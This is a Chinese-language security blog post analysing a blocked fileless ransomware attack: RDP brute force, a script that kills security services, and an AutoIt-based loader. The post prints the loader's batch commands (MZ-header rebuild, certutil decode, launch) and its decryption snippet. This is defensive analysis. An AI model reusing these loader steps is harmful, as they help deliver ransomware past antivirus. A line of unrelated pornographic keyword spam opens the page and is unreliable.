国产成人毛片毛片久久网_国产午夜激无码av毛片不_国产乱对白精彩在线播放_av资源站中文字幕_亚洲男人的天堂网站_国产成 人 综合 亚洲网_中国国产激情一区_少妇一级淫片免费放_亚洲一本大道av久在线播放_免费观看美女裸体网站

安全播報

防御吧作為15年知名老牌域名服務商,CNNIC和CANN雙認證域名注冊商,已經(jīng)
持續(xù)為500多萬個域名提供服務,包括智能DNS/自由轉(zhuǎn)移/隱私保護等服務!
一次新型無文件攻擊形式的勒索病毒防御過程剖析
2020-12-01 14:18:11 【

黑客首先通過RDP暴力破解登陸客戶機器,獲取機器的控制權(quán)限。


云安全中心監(jiān)控到兩個位于拉脫維亞里加的IP:188.92.77.15和188.92.79.123 成功登陸主機。


登陸成功后,黑客遠程拷貝Killer.bat惡意腳本到主機并執(zhí)行,該腳本主要功能是關(guān)閉安全軟件、系統(tǒng)服務等。


黑客開始第一次勒索攻擊,植入文件名為SOS.exe的勒索病毒,運行之后被云安全中心主機防御成功攔截。


黑客發(fā)現(xiàn)對抗之后,開始使用load加載的免殺繞過方式,植入a.exe,這是一個使用7zip打包后的自解壓exe程序,將其解壓之后,釋放了4個文件:cnbbrnrhi.com、kiwvyrcee.com、lozgzxher.com、qnsdpztxh.com。


其中kiwvyrcee.com是一個批處理文件:




Set byoraiood=Q


ping -n 1 wnmosszxn


<nul set /p ="MZ" > rundll32.com


type cnbbrnrhi.com >> rundll32.com


del cnbbrnrhi.com


certutil -decode lozgzxher.com Q


start /w rundll32.com Q


ping 127.0.0.1 -n 6


cnbbrnrhi.com添加"MZ"之后生成了rundll32.com,它其實是AutoIt.exe,是一個自動化的Windows界面交互的腳本語言解釋器,由于本身屬于合法程序,黑客可以把惡意代碼藏在腳本文件中,從而靈活地執(zhí)行惡意操作。


lozgzxher.com是一個開源的AutoIt解密腳本,將混淆加密后的勒索病毒qnsdpztxh.com加載到內(nèi)存中解密執(zhí)行。其代碼執(zhí)行流如下:



$in = FileOpen("qnsdpztxh.com", BitRotate(2147483648, -$GNWWRZY, "D"))

$FileData = FileRead($in)

$UncryptedData = _Crypt_DecryptData($FileData, $CryptedKey, 0)




qnsdpztxh.com解密后,發(fā)現(xiàn)其md5和SOS.exe勒索病毒一致,因此判斷黑客嘗試通過AutoIt腳本來投遞二進制勒索病毒母體,還是未能繞過云安全中心主機防御。




勒索病毒準備關(guān)閉數(shù)據(jù)庫等服務,被主機防御成功攔截:



勒索病毒準備加密磁盤文件,被主機防御成功攔截:



應對措施


勒索病毒對企業(yè)來說是危害極大的安全風險之一,一旦核心數(shù)據(jù)或文件被加密,除了繳納贖金,基本上無法解密。阿里云云安全中心(主機防御)已經(jīng)實現(xiàn)逐層遞進的縱深式防御:


首先借助云上全方位的威脅情報,云安全中心實現(xiàn)了對大量已知勒索病毒的實時防御,在企業(yè)主機資源被病毒感染的第一時間進行攔截,避免發(fā)生文件被病毒加密而進行勒索的情況;

其次,通過放置誘餌的方式,云安全中心實時捕捉可能的勒索病毒行為,尤其針對新型未知的勒索病毒,一旦識別到有異常加密行為發(fā)生,會立刻攔截同時通知用戶進行排查,進行清理;

最后,在做好對勒索病毒防御的情況下,云安全中心還支持文件備份服務,能定期對指定文件進行備份,支持按時間按文件版本恢復,在極端情況發(fā)生而導致文件被加密時,能夠通過文件恢復的方式找回,做到萬無一失。


】【打印關(guān)閉】 【返回頂部
分享到QQ空間
分享到: 
上一篇Microsoft Defender防病毒軟件現(xiàn).. 下一篇這9種方式可以繞過Web應用程序防..

立足首都,輻射全球,防御吧專注云防御及云計算服務15年!

聯(lián)系我們

服務熱線:13051179500 18910191973
企業(yè)QQ:1245940436
技術(shù)支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解決防御與加速) 版權(quán)所有 增值許可:京B2-20140042號
售前咨詢
公司總機:18910191973
24小時電話:010-56159998
投訴電話:18910191973
值班售后/技術(shù)支持
售后服務/財務
備案專員
緊急電話:18610088800